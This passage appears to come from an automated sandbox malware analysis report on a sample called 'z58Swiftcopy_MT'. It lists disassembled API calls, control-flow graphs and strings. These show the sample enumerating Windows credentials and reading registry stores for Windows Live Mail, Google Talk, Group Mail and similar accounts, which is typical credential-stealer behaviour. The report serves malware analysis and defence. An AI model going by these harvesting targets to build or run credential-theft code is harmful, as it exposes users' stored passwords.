                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                                                                      • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044430B
                                                                                                                                                                                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                                                                                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                                                                                                                                        • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                                                                                                                                        • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                                                                                                                                        • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                                                                        • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444379
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444394
                                                                                                                                                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004443DB
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 00444401
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Store Root, xrefs: 004443A5
                                                                                                                                                                                                                                      • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                                                                                                                                      • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                                                                                                                                      • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F567
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F57F
                                                                                                                                                                                                                                        • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                                                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2012582556-3916222277

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      control_flow_graph 331 4086e0-408704 call 4045db 334 4088f7-408906 call 404656 331->334 335 40870a-408716 331->335 337 408718-40872b CredEnumerateW 335->337 338 40872d-408731 335->338 337->338 338->334 341 408737-408764 wcslen 338->341 343 40876a 341->343 344 4088ef-4088f3 LocalFree 341->344 345 40876f-408774 343->345 344->334 345->344 346 40877a-40879e wcsncmp 345->346 347 4087a4-4087bb 346->347 348 4088dd-4088e9 346->348 347->347 349 4087bd-4087ee call 40466b call 404734 347->349 348->344 348->345 354 4088d1-4088d8 call 404785 349->354 355 4087f4-40880c call 4047a5 349->355 354->348 355->354 359 408812-408838 memset 355->359 360 40883a 359->360 361 40883c-4088a9 memcpy wcschr 359->361 360->361 362 4088b7-4088cb LocalFree 361->362 363 4088ab-4088b3 361->363 362->354 363->362
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040874A
                                                                                                                                                                                                                                      • wcsncmp.MSVCRT ref: 00408794
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040882A
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040889F
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                                                                                                                      • LocalFree.KERNELBASE(?), ref: 004088F3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$FreeLocal$LibraryLoadmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                                                      • String ID: J$Microsoft_WinInet
                                                                                                                                                                                                                                      • API String ID: 3950215071-260894208

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      control_flow_graph 365 4037ca-40381c memset * 2 call 444551 368 4038e2-4038e5 365->368 369 403822-403882 call 4021b6 call 406f06 * 2 strchr 365->369 376 403884-403895 _mbscpy 369->376 377 403897-4038a2 strlen 369->377 378 4038bf-4038dd _mbscpy call 4023e5 376->378 377->378 379 4038a4-4038bc sprintf 377->379 378->368 379->378
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004037EB
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004037FF
                                                                                                                                                                                                                                        • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                                                                                                                                        • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040386E
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403897
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 004038B7
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                                                                      • String ID: %s@yahoo.com
                                                                                                                                                                                                                                      • API String ID: 317221925-3288273942

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      control_flow_graph 381 4034e4-403544 memset * 2 call 410b1e 384 403580-403582 381->384 385 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 381->385 385->384
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403504
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040351A
                                                                                                                                                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                                                                                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                                                                      • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                                                                      • API String ID: 3071782539-966475738

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      control_flow_graph 390 40ccd7-40cd06 ??2@YAPAXI@Z 391 40cd08-40cd0d 390->391 392 40cd0f 390->392 393 40cd11-40cd24 ??2@YAPAXI@Z 391->393 392->393 394 40cd26-40cd2d call 404025 393->394 395 40cd2f 393->395 396 40cd31-40cd57 394->396 395->396 399 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 396->399 400 40cd59-40cd60 DeleteObject 396->400 400->399
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040CD5A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040CD96
                                                                                                                                                                                                                                      • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2054149589-0

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                                                                                        • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                                                                                        • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                                                                        • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2099061454-0

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408620
                                                                                                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408671
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                                                                                                                                      • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                                                                      • API String ID: 1366857005-1079885057

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                                                                      • String ID: /nosort$/sort
                                                                                                                                                                                                                                      • API String ID: 882979914-1578091866
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                                                                                        • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                                                                                                                                        • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                                                                                        • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                                                                        • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2099061454-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2152742572-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,762D0A60,?,00000000), ref: 00410D1C
                                                                                                                                                                                                                                        • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410E10
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                                                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                                      • API String ID: 889583718-2036018995
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3473537107-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004109F7
                                                                                                                                                                                                                                        • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                                                                                                        • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410A32
                                                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3143880245-0
                                                                                                                                                                                                                                      APIs
